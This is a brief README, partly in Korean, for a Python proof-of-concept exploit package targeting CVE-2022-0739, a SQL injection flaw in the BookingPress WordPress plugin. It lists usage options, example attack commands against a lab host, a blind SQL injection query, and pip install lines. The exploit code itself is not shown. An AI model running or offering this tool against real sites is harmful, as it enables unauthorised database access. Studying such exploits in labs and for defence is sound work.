
🐍 CVE-2022-0739용 Python 익스플로잇
CVE-2022-0739용 Python PoC 익스플로잇
usage: cve-2022-0739 [-h] -u URL [-e EXEC]
options:
-h, --help show this help message and exit
-u URL, --url URL URL of the page containing the BookingPress Widget
-e EXEC, --exec EXEC Optional query for Blind SQL Injection
cve-2022-0739 --url http://metapress.htb/event
cve-2022-0739 --url http://metapress.htb/event --exec "SELECT SLEEP(5)"
python3 -m pip install cve-2022-0739
python3 -m pip install cve_2022_0739-1.0.0-py3-none-any.whl